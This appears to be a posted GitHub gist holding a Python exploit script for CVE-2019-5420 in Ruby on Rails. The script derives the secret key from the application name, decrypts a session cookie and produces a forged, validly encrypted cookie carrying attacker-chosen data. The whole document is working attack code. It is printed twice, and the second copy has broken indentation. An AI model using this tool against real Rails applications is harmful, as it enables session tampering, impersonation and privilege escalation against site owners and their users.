adenkiewicz/CVE-2019-5420.py

## CVE-2019-5420.py
#!/usr/bin/env python3
#
# This is a simple decrypt-temper-encrypt tool for CVE-2019-5420 affecting ruby
# If you're lucky, session cookie will contain user id or other data to play with
# Look for cookies with two "--" substrings inside

import urllib.parse
import hashlib
import base64
from Cryptodome.Cipher import AES
import sys

className = input("Provide App name: ")
if not("::Application" in className):
    className = className + "::Application"

# https://github.com/rails/rails/blob/v5.2.2/actionpack/lib/action_dispatch/railtie.rb#L22
salt = b"authenticated encrypted cookie"

h = hashlib.md5(className.encode())
secret = hashlib.pbkdf2_hmac('sha1', h.hexdigest().encode(), salt, 1000, dklen=32)

cookie = input("Provide session cookie value: ")
cookie = urllib.parse.unquote(cookie)

# https://github.com/rails/rails/blob/v5.2.2/activesupport/lib/active_support/message_encryptor.rb#L185
encrypted_data, iv, auth_tag = [base64.b64decode(x) for x in cookie.split("--")]

cipher = AES.new(secret, AES.MODE_GCM, iv)
plaintext = cipher.decrypt(encrypted_data)
try:
    cipher.verify(auth_tag)
    print("Here's your decoded cookie:")
    print(plaintext.decode())
except ValueError:
    print("Decode failed")
    sys.exit(-1)

cipher = AES.new(secret, AES.MODE_GCM, iv)
forged = input("\nProvide forged session cookie: ")
forged_encrypted_data, forged_auth_tag = cipher.encrypt_and_digest(forged.encode())
forged_cookie = "--".join(base64.b64encode(x).decode() for x in [forged_encrypted_data, iv, forged_auth_tag])
forged_cookie = urllib.parse.quote(forged_cookie)
print("Here's your forged cookie:")
print(forged_cookie)
	#!/usr/bin/env python3
	#
	# This is a simple decrypt-temper-encrypt tool for CVE-2019-5420 affecting ruby
	# If you're lucky, session cookie will contain user id or other data to play with
	# Look for cookies with two "--" substrings inside

	import urllib.parse
	import hashlib
	import base64
	from Cryptodome.Cipher import AES
	import sys

	className = input("Provide App name: ")
	if not("::Application" in className):
	className = className + "::Application"

	# https://github.com/rails/rails/blob/v5.2.2/actionpack/lib/action_dispatch/railtie.rb#L22
	salt = b"authenticated encrypted cookie"

	h = hashlib.md5(className.encode())
	secret = hashlib.pbkdf2_hmac('sha1', h.hexdigest().encode(), salt, 1000, dklen=32)

	cookie = input("Provide session cookie value: ")
	cookie = urllib.parse.unquote(cookie)

	# https://github.com/rails/rails/blob/v5.2.2/activesupport/lib/active_support/message_encryptor.rb#L185
	encrypted_data, iv, auth_tag = [base64.b64decode(x) for x in cookie.split("--")]

	cipher = AES.new(secret, AES.MODE_GCM, iv)
	plaintext = cipher.decrypt(encrypted_data)
	try:
	cipher.verify(auth_tag)
	print("Here's your decoded cookie:")
	print(plaintext.decode())
	except ValueError:
	print("Decode failed")
	sys.exit(-1)

	cipher = AES.new(secret, AES.MODE_GCM, iv)
	forged = input("\nProvide forged session cookie: ")
	forged_encrypted_data, forged_auth_tag = cipher.encrypt_and_digest(forged.encode())
	forged_cookie = "--".join(base64.b64encode(x).decode() for x in [forged_encrypted_data, iv, forged_auth_tag])
	forged_cookie = urllib.parse.quote(forged_cookie)
	print("Here's your forged cookie:")
	print(forged_cookie)